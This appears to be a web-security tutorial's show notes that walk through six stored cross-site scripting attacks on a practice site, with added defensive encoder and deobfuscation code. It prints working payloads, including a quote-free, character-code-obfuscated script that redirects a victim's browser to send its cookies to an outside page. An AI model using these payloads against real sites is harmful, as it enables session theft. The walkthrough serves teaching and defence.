Hands On Series – Cross Site Scripting (XSS) Part 1

The “Hands on Series” continues!


In this episode we start dealing with Cross Site Scripting (XSS) attacks.

CSS = Cascading Style Sheets
XSS = Cross Site Scripting

Cross Site Scripting is a technique for adding script to a trusted site so that it executes in other users' browsers.
A key element of XSS is that one user can submit data to a website that will later be displayed to other users.
It is necessary that the bad guy NOT break the HTML structure; otherwise the result is web defacement rather than an attack on other users.

The hackme site has been updated and improved (more about that in a moment) and now includes a section for XSS which we will be using in this episode.


As usual, for the “Hands on Series” I recommend that you listen to these episodes while viewing the hacking test site and have the show notes visible and ready to cut and paste from.

If we look at the source for the page we will see this:

Let's start by trying to add an attribute so that when someone mouses over the name, the JavaScript will be executed.

Attack #1 – Against Email Address

Attack 1: Original

<a href="mailto:john@somedomain.com">John Doe</a>

Attack 1: Desired addition
onmouseover="alert('Hacked');"

Attack 1: Desired Result
<a href="mailto:bob@bob.com" onmouseover="alert('Hacked');">Bob Smith</a>

Attack 1: Attack String
bob@bob.com" onmouseover="alert('Hacked');

Attack 1: Actual Result
<a href="mailto:bob@bob.com" onmouseover="alert('Hacked');">Bob Smith</a>

Success! Mouse over the name you entered and you see a popup that says “Hacked”.
At this point we have proven that we can insert code onto the site and have it executed by a web browser!
This attack only runs on a user event (the user mousing over the link).

Let's try creating a script tag, which will be executed while the page is loaded by the browser (so basically right away).

Attack #2 – Against Email Address

Attack 2: Original
<a href="mailto:john@somedomain.com">John Doe</a>

Attack 2: Desired addition
<script>alert('Hacked');</script>

Attack 2: Desired Result
<a href="mailto:bob@bob.com"><script>alert('Hacked');</script><">Bob Smith</a>

Attack 2: Attack String
bob@bob.com"><script>alert('Hacked');</script><"

Attack 2: Actual Result
<a href="mailto:bob@bob.com"&gt;&lt;script&gt;alert('Hacked');&lt;/script&gt;&lt;"">Bob Smith</a>

Failure! No popup takes place.
Notice the Actual Result does not match the Desired Result.
This is because of htmlentities, as mentioned in the helper notes.

Attack #3 – Against Title

Attack 3: Original
<td>Works Great</td>

Attack 3: Desired addition
<script>alert('Hacked');</script>

Attack 3: Desired Result
<td><script>alert('Hacked');</script></td>

Attack 3: Attack String
Works Great<script>alert('Hacked');</script>

Attack 3: Actual Result
<td>Works Great<script>alert(&#39;Hacked&#39;);</script></td>

Failure! No popup takes place.
This almost worked, except that the single and double quotes get escaped, so let's try building something that doesn't need quotes.

Attack #4 – Against Title

In the alert function let's use the document.domain property in the attack string; it is an expression, not a string literal, so it needs no quotes.

Attack 4: Attack String
Works Great<script>alert(document.domain);</script>

Attack 4: Actual Result
<td>Works Great<script>alert(document.domain);</script></td>

Success! A popup should appear that says hackme.ntobjectives.com
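The four attacks so far come down to two different encoding mistakes: the Email field lets quotes through (so a value can close the href attribute and add an event handler), while the Title field lets angle brackets through (so a script element goes in as long as the payload avoids quotes). The following is an added example, not code from the original post or from the hackme site; it reproduces both mistakes next to a context-aware encoder and checks the rendered markup the way a browser would read it. The two "broken" encoders are assumptions inferred from the Actual Result lines above, and the checks are deliberately minimal.

```javascript
// Added example, not code from the original post or from the hackme site.
// Node.js, no dependencies.  The encodeAnglesOnly / encodeQuotesOnly
// behaviours are assumptions inferred from the Actual Result lines above.

// Full HTML encoding: safe for text content and for double-quoted attribute
// values; single quotes are covered as well for single-quoted attributes.
function encodeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Mistake 1 (what the Email field appears to do in attacks 1 and 2): angle
// brackets are encoded but quotes are not, so a value can terminate the
// href attribute and append new attributes such as onmouseover.
function encodeAnglesOnly(s) {
  return String(s).replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Mistake 2 (what the Title field appears to do in attacks 3 and 4): quotes
// are encoded but angle brackets are not, so a <script> element passes
// through whenever the payload itself avoids quotes.
function encodeQuotesOnly(s) {
  return String(s).replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

// The two templates from the hackme page, parameterised by encoder.
function renderEmailLink(email, name, encode) {
  return `<a href="mailto:${encode(email)}">${encode(name)}</a>`;
}
function renderTitleCell(title, encode) {
  return `<td>${encode(title)}</td>`;
}

// Names of the double-quoted attributes a browser would see on the first
// start tag.  Minimal on purpose: it only has to tell one attribute from two.
function attributeNames(html) {
  const tag = /<[a-z]+([^>]*)>/i.exec(html);
  if (!tag) return [];
  const names = [];
  const attr = /([a-z-]+)="[^"]*"/gi;
  let m;
  while ((m = attr.exec(tag[1])) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Number of start tags in a fragment; data that adds one has escaped the
// text context it was supposed to stay in.
function countStartTags(html) {
  return (html.match(/<[a-z]/gi) || []).length;
}

// Attack strings from the post above, used here as constructed test input.
const ATTACK1_EMAIL = 'bob@bob.com" onmouseover="alert(\'Hacked\');';
const ATTACK4_TITLE = "Works Great<script>alert(document.domain);</script>";

console.log("email, angles only :", attributeNames(renderEmailLink(ATTACK1_EMAIL, "Bob Smith", encodeAnglesOnly)));
console.log("email, full encode :", attributeNames(renderEmailLink(ATTACK1_EMAIL, "Bob Smith", encodeHtml)));
console.log("title, quotes only :", countStartTags(renderTitleCell(ATTACK4_TITLE, encodeQuotesOnly)), "start tags");
console.log("title, full encode :", countStartTags(renderTitleCell(ATTACK4_TITLE, encodeHtml)), "start tags");
```

With the angles-only encoder the email link ends up with two attributes, href and onmouseover; with the quotes-only encoder the title cell gains a second start tag. The full encoder leaves one attribute and one tag in both cases, which is the property to test for: encode for the context the value lands in, and encode all five characters, not the subset that happened to break the last payload.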

Maybe this isn't convincing enough… let's try cookies.

Attack #5 – Against Title

Attack 5: Attack String
Works Great<script>alert(document.cookie);</script>

Attack 5: Actual Result

<td>Works Great<script>alert(document.cookie);</script></td>

Success! A popup should appear that shows all your cookie data.
There's nothing stopping the attacker from having the user's browser send this data to their server.

I have set up a page for displaying inputs sent to it, but it makes sure to escape characters so that it isn't an attack point itself.

http://hackme.ntobjectives.com/xss/bin.php

Try it now

http://hackme.ntobjectives.com/xss/bin.php?abc=123
You should be shown that abc=123
This page will display anything you put in the GET params.

I want to push your cookie data over to my site, so that I can attempt a session take over.

Attack #6 – Against Title

Attack 6: Original
<td>Works Great</td>

Attack 6: Desired addition

<script>window.location='http://hackme.ntobjectives.com/xss/bin.php?var='+document.cookie;</script>

We have already established that I cannot insert the single quotes I need around the URL, so we have to resort to slightly more advanced methods.
The JavaScript function String.fromCharCode gets around the need for quotes: it turns each decimal value into its character, and the call itself requires no quotes.

So we first convert each character of the desired string into its decimal character code.

This:
http://hackme.ntobjectives.com/xss/bin.php?var=

becomes:

104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61

and the attack string becomes

Attack 6: Attack String
Works Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script>

Attack 6: Actual Result
<td>Works Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script></td>

Success! Your browser should be sitting on http://hackme.ntobjectives.com/xss/bin.php and showing you all the data from your cookies.
If this were an attacker's site, it would simply collect the info and send you back to the page you came from, and it's unlikely you would ever have noticed that your session information had been stolen.
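The String.fromCharCode trick above hides the destination URL from anyone eyeballing stored reviews or request logs, so a reviewer needs to expand such calls before deciding what a submitted value does. The following is an added example, not code from the original post: a small decoder that rewrites every String.fromCharCode(...) call into the literal it evaluates to, plus a coarse triage rule for values that pair an absolute URL with document.cookie. Run over the decimal list the post gives, it reveals that the list actually spells out http://hackme.mightyseek.com/xss/bin.php?var= rather than the hackme.ntobjectives.com URL shown as the source string (the test site evidently moved domains), which is precisely the kind of thing a decoder surfaces that a visual read does not. The benign review string is constructed for the demo.

```javascript
// Added example, not code from the original post.  Node.js, no dependencies.
// Reviewer-side decoder for String.fromCharCode(...) obfuscation.

const FROM_CHAR_CODE = /String\.fromCharCode\(\s*([\d\s,]*)\)/g;

// Turns "104,116,116,112" into "http".  Whitespace around the numbers is
// ignored, just as a JavaScript engine ignores it in an argument list.
function decodeCharCodes(list) {
  return list
    .split(",")
    .map((n) => n.trim())
    .filter((n) => n.length > 0)
    .map((n) => String.fromCharCode(Number(n)))
    .join("");
}

// Replaces every String.fromCharCode(...) call with the quoted literal it
// evaluates to; everything else in the input is left untouched.
function deobfuscate(input) {
  return input.replace(FROM_CHAR_CODE, (_match, list) => JSON.stringify(decodeCharCodes(list)));
}

// Coarse triage rule for stored input: after decoding, does the value build
// an absolute URL and read document.cookie?  Enough to route the entry to a
// human; not a substitute for output encoding on the rendering side.
function looksLikeCookieExfil(input) {
  const decoded = deobfuscate(input);
  return /document\.cookie/.test(decoded) && /https?:\/\//.test(decoded);
}

// The decimal list from the post, with one stray space left in to show the
// decoder tolerates the wrapping that show notes tend to introduce.
const POST_CHAR_CODES =
  "104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46, " +
  "99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61";

// Attack 6 string from the post, and a constructed harmless review.
const ATTACK6_TITLE = `Works Great<script>window.location=String.fromCharCode(${POST_CHAR_CODES})+document.cookie;</script>`;
const BENIGN_TITLE = "Works Great, five stars";

console.log("decoded list :", decodeCharCodes(POST_CHAR_CODES));
console.log("decoded value:", deobfuscate(ATTACK6_TITLE));
console.log("flagged      :", looksLikeCookieExfil(ATTACK6_TITLE), looksLikeCookieExfil(BENIGN_TITLE));
```

Decoding is for triage only; the fix is still to encode the Title field for its HTML text context (the angle brackets are what let the script element in). Separately, marking the session cookie HttpOnly keeps it out of document.cookie altogether, so even a script that does run cannot read it, which is the single most effective way to blunt this particular payload.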

About Dan Kuykendall 173 Articles

3 Comments

  1. Listening to the podcast, but your podcast doesn’t match up with your hackme site. There is no John Doe on it to “screw around with”…
    Great idea though. I may come back at a future date and try again.

  2. This lesson looks pretty good, I'd love to be able to follow it, but on the Hackme site when I click the product review list all I see is:

    “Warning: mysql_connect() [function.mysql-connect]: Access denied for user ‘ms_hackme_xss’@’localhost’ (using password: YES) in /var/www/webscantest/hackme/xss/products.php on line 5

    Warning: mysql_error(): supplied argument is not a valid MySQL-Link resource in /var/www/webscantest/hackme/xss/products.php on line 7
    Could not connect:”

    I don't know if it's just me or the website, bummer though, I wanted to go along with this.
